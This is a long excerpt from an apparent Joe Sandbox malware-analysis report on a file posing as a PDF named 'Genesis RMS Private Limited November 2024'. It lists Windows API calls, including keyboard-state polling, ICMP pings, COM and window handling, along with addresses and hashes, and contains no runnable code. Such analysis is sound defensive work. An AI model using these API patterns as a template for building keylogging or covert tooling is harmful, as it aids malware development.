                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                      • Opcode ID: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                                                                                                                      • Instruction ID: 1f5e5612de6bc84f238b005ecc58d5b8f02c67d21c798e9073809516c1763d75
                                                                                                                      • Opcode Fuzzy Hash: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                                                                                                                      • Instruction Fuzzy Hash: DD216FB0206704EFE7015B60ED89BE63B7EFB54386F089429F102822B1DB799D508B66
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007BD855
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007BD8E8
                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 007BD8FC
                                                                                                                      • CoCreateInstance.OLE32(007E2D7C,00000000,00000001,0080A89C,?), ref: 007BD948
                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007BD9B7
                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 007BDA0F
                                                                                                                      • _memset.LIBCMT ref: 007BDA4C
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 007BDA88
                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007BDAAB
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 007BDAB2
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007BDAE9
                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 007BDAEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1246142700-0
                                                                                                                      • Opcode ID: d13ec442195752366146243a5e67acc6e1826615460e8db120b41fcece8b9f96
                                                                                                                      • Instruction ID: e0d6fd526cb851e5b97d9a2af5a7f453b51f798015fa69b4b40f37dd22f411b1
                                                                                                                      • Opcode Fuzzy Hash: d13ec442195752366146243a5e67acc6e1826615460e8db120b41fcece8b9f96
                                                                                                                      • Instruction Fuzzy Hash: ACB10A75A00108EFDB14DFA4C888EAEBBB9FF48315B148469F90AEB251DB74ED45CB50
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 007B05A7
                                                                                                                      • SetKeyboardState.USER32(?), ref: 007B0612
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 007B0632
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 007B0649
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 007B0678
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 007B0689
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 007B06B5
                                                                                                                      • GetKeyState.USER32(00000011), ref: 007B06C3
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 007B06EC
                                                                                                                      • GetKeyState.USER32(00000012), ref: 007B06FA
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 007B0723
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 007B0731
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                                      • Instruction ID: ec384e3dae67a16c38cbc7f1793013f2f86f244beb04860638577318896dad61
                                                                                                                      • Opcode Fuzzy Hash: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                                      • Instruction Fuzzy Hash: AD51EB20A0478859FF35DBB08455BEBBFB49F01380F48859AD5C2565C2DA6CAB4CCBE1
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 007AC746
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 007AC758
                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AC7B6
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 007AC7C1
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 007AC7D3
                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AC827
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 007AC835
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 007AC846
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AC889
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 007AC897
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AC8B4
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 007AC8C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                                      • Instruction ID: 3e5ea42c84cb4925b0de5092a1cf15d1344de85a4d52c0a863d6db2c66404f13
                                                                                                                      • Opcode Fuzzy Hash: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                                      • Instruction Fuzzy Hash: A2514F71B00205BBDB18CF68DD89AAEBBB6FB89311F14822DF516D6290D7749D008B14
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007520D3
                                                                                                                      • KillTimer.USER32(-00000001,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0075216E
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0078BEF6
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF27
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF3E
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF5A
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0078BF6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 641708696-0
                                                                                                                      • Opcode ID: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                                                                                                                      • Instruction ID: 88023b7e3369f7b0aabd978791bccdbc300463d1838439231ea6b1f55058618f
                                                                                                                      • Opcode Fuzzy Hash: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                                                                                                                      • Instruction Fuzzy Hash: 1F619E31102610DFCB35AF14DD48BAAB7F1FF41312F108529E986879A1D7BDA896DF50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 007521D3
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
• Instruction ID: acdbe4cb752a358f373f4b4e0d497cf7cfb471f672f6dbdf994e5e4485c7ef69
• Opcode Fuzzy Hash: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
• Instruction Fuzzy Hash: 6641B1351011449BDB215F28EC88BF93B65FB07332F198266FD668A1E2C77A8C47DB61
APIs
• CharLowerBuffW.USER32(?,?,007DF910), ref: 007BAB76
• GetDriveTypeW.KERNEL32(00000061,0080A620,00000061), ref: 007BAC40
• _wcscpy.LIBCMT ref: 007BAC6A
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
• Instruction ID: cec151861a0ba080fb8cd52260b8e1b1be3d14175529f5b9dd6243582b70ddae
• Opcode Fuzzy Hash: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
• Instruction Fuzzy Hash: 6D519D70208301EBC724EF54C895AEBB7A5FF84301F148829F996972E2DB79D949CA53
APIs
Strings
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: 2097f5fcf790391117d7cb06155288c19c7f622681e6ed9361ad9c0e5b843ab0
• Instruction ID: c87137aafa47d02b058b69334f42613ad2e7bf0165c465b4f9537a3f8f9cbe1f
• Opcode Fuzzy Hash: 2097f5fcf790391117d7cb06155288c19c7f622681e6ed9361ad9c0e5b843ab0
• Instruction Fuzzy Hash: 5C410671614205EFDF24EF38DC46FBA73E8EB44300F20846EEA49D7281EA79A945CB11
APIs
• _memset.LIBCMT ref: 007D73D9
• CreateMenu.USER32 ref: 007D73F4
• SetMenu.USER32(?,00000000), ref: 007D7403
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7490
• IsMenu.USER32(?), ref: 007D74A6
• CreatePopupMenu.USER32 ref: 007D74B0
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D74DD
• DrawMenuBar.USER32 ref: 007D74E5
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
• Instruction ID: e6c3e20f3f4f589de30df119eb5ac39dff6a05f99dd0b8fcb25ba6c38d6e5d13
• Opcode Fuzzy Hash: 27ec327dfe2a5367538b68f47a6ec38a45ca2f4154c6bc92d4a96c7c230af6a8
• Instruction Fuzzy Hash: D1415874A05245EFDB15DF64E884EDABBB9FF49310F14802AED5697360E738A920CB50
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007D77CD
• CreateCompatibleDC.GDI32(00000000), ref: 007D77D4
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007D77E7
• SelectObject.GDI32(00000000,00000000), ref: 007D77EF
• GetPixel.GDI32(00000000,00000000,00000000), ref: 007D77FA
• DeleteDC.GDI32(00000000), ref: 007D7803
• GetWindowLongW.USER32(?,000000EC), ref: 007D780D
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007D7821
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007D782D
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: edea286e96a9bb52cf2fe127b5a8adcb3d593d806ae93cca29c8b7afc69ee282
• Instruction ID: 005aa33ef87617caa9841338484d45b8d20bb3fd4b2d5ff701976a0a4b6e3ef5
• Opcode Fuzzy Hash: edea286e96a9bb52cf2fe127b5a8adcb3d593d806ae93cca29c8b7afc69ee282
• Instruction Fuzzy Hash: 8F316D31105219EBDF159FA4DC09FDA3B79FF09321F118226FA16A62A0D739D821DBA4
APIs
• _memset.LIBCMT ref: 0077707B
  • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
• __gmtime64_s.LIBCMT ref: 00777114
• __gmtime64_s.LIBCMT ref: 0077714A
• __gmtime64_s.LIBCMT ref: 00777167
• __allrem.LIBCMT ref: 007771BD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007771D9
• __allrem.LIBCMT ref: 007771F0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0077720E
• __allrem.LIBCMT ref: 00777225
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00777243
• __invoke_watson.LIBCMT ref: 007772B4
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
• Instruction ID: 8aa4718af0ed251f67180e8f8336bdae3396fbf4bd8ca56ff95dd5874227accb
• Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
• Instruction Fuzzy Hash: B671F771A44707EBDB18AE79CC45B6AB3B8BF507A4F14C23AF518D6682E778D900C790
APIs
• _memset.LIBCMT ref: 007B2A31
• GetMenuItemInfoW.USER32(00816890,000000FF,00000000,00000030), ref: 007B2A92
• SetMenuItemInfoW.USER32(00816890,00000004,00000000,00000030), ref: 007B2AC8
• Sleep.KERNEL32(000001F4), ref: 007B2ADA
• GetMenuItemCount.USER32(?), ref: 007B2B1E
• GetMenuItemID.USER32(?,00000000), ref: 007B2B3A
• GetMenuItemID.USER32(?,-00000001), ref: 007B2B64
• GetMenuItemID.USER32(?,?), ref: 007B2BA9
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B2BEF
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C03
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2C24
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
• Instruction ID: dee3fa73bb35f861feb99633efd6159870cbcdba681b9d9a054c1dc12e681c82
• Opcode Fuzzy Hash: 40779c3ca52ce2e3e811ad2da749e1d6b31d840755ea26b3fd2c65337a8ad59b
• Instruction Fuzzy Hash: E4619FB0902249AFDB11CF64DC88EFF7BB8EB05304F148559E85297252EB39AD16DB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D7214
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D7217
• GetWindowLongW.USER32(?,000000F0), ref: 007D723B
• _memset.LIBCMT ref: 007D724C
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D725E
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D72D6
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                                                                                                                      • Instruction ID: ec9bf24cfd64cb6ec59cabe6ebaff50d952fc938fa7741dd3774c23ed1787713
                                                                                                                      • Opcode Fuzzy Hash: 9c7b4924c9c8b47339301e29abde4d8bc0d7682e44339e228eccf2ea8491c385
                                                                                                                      • Instruction Fuzzy Hash: 85616A71900248AFDB10DFA4CC81EEE77B8FF09700F14416AFA55AB3A1E778A955DB60
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007A7135
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 007A718E
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007A71A0
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 007A71C0
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 007A7213
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 007A7227
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007A723C
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 007A7249
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A7252
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007A7264
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A726F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                                                                                                                      • Instruction ID: f1d4741962e4b8941472f66d02966a8289bb5606b29c76b24128692c7ba38128
                                                                                                                      • Opcode Fuzzy Hash: e6c074abe99170db7f86f6ca2f9511e402a200f49151f9b49f810832b9fd3d4e
                                                                                                                      • Instruction Fuzzy Hash: 8C413D35900219EFCB04DF64DC48AAEBBB8FF49354F00C169E956A7261CB78A945CFA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • CoInitialize.OLE32 ref: 007C8718
                                                                                                                      • CoUninitialize.OLE32 ref: 007C8723
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,007E2BEC,?), ref: 007C8783
                                                                                                                      • IIDFromString.OLE32(?,?), ref: 007C87F6
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007C8890
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007C88F1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                      • Opcode ID: b4da10933a4d71d6991709db0e879f7c87949eaf3267bf39ff9b37ca3481cde9
                                                                                                                      • Instruction ID: 075018921f997d6537d5f103ac39327009e84f8a2c09953b20afe7f128f12d2a
                                                                                                                      • Opcode Fuzzy Hash: b4da10933a4d71d6991709db0e879f7c87949eaf3267bf39ff9b37ca3481cde9
                                                                                                                      • Instruction Fuzzy Hash: C8617870608301EFD750DB64C848F6ABBE8AF89714F14491EF9859B291DB78ED48CB93
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 007C5AA6
                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 007C5AEB
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 007C5AF7
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 007C5B05
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B75
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5B8B
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C5C00
                                                                                                                      • WSACleanup.WSOCK32 ref: 007C5C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      • Opcode ID: 17ab192e784b64b5d10ad33f0102eda7e3926f6676aa109af67781f106d19ae7
                                                                                                                      • Instruction ID: 1d330fcbf876e61e2b6cc1b9415f9b2071caebc822a2a9e16834419b0e15b793
                                                                                                                      • Opcode Fuzzy Hash: 17ab192e784b64b5d10ad33f0102eda7e3926f6676aa109af67781f106d19ae7
                                                                                                                      • Instruction Fuzzy Hash: CB516A71604701DFDB209F24C849F6ABBE4EB44310F14892EF956DB2A1DB79FC448B55
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 007BB73B
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BB7B1
                                                                                                                      • GetLastError.KERNEL32 ref: 007BB7BB
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 007BB828
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
